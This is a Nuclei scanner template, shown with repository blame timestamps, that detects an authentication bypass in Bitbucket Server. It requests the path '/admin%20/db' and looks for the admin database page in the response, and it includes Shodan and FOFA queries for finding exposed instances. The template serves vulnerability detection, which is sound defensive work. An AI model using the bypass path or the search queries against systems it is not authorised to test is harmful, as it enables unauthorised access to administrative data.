nuclei-templates/http/misconfiguration/bitbucket-auth-bypass.yaml

37 lines
1.1 KiB
YAML
Raw Normal View History

id: bitbucket-auth-bypass
2023-08-05 21:59:23 +00:00
info:
name: Bitbucket Server > 4.8 - Authentication Bypass
2023-08-05 21:59:23 +00:00
author: DhiyaneshDk
severity: critical
description: |
There is a permission bypass vulnerability through %20, which allows arbitrary users to obtain sensitive data
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Atlassian%20Bitbucket%20%E7%99%BB%E5%BD%95%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
2023-10-14 11:27:55 +00:00
max-request: 1
2023-08-05 21:59:23 +00:00
shodan-query: title:"Log in - Bitbucket"
2023-10-14 11:27:55 +00:00
fofa-query: title="Log in - Bitbucket"
2023-08-05 21:59:23 +00:00
tags: misconfig,atlassian,bitbucket,auth-bypass
http:
- method: GET
path:
- "{{BaseURL}}/admin%20/db"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<h2>Database</h2>"
- "Migrate database"
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502201946e48b08668a0597ded653e54bb13c9963cbdb12f6346ec925a3e6e076ed1b022100a2f3c87d0283a2d813f657de5284441fcb2c45757e5892bac85dee2fbec0a7ed:922c64590222798bb761d5b6d8e72950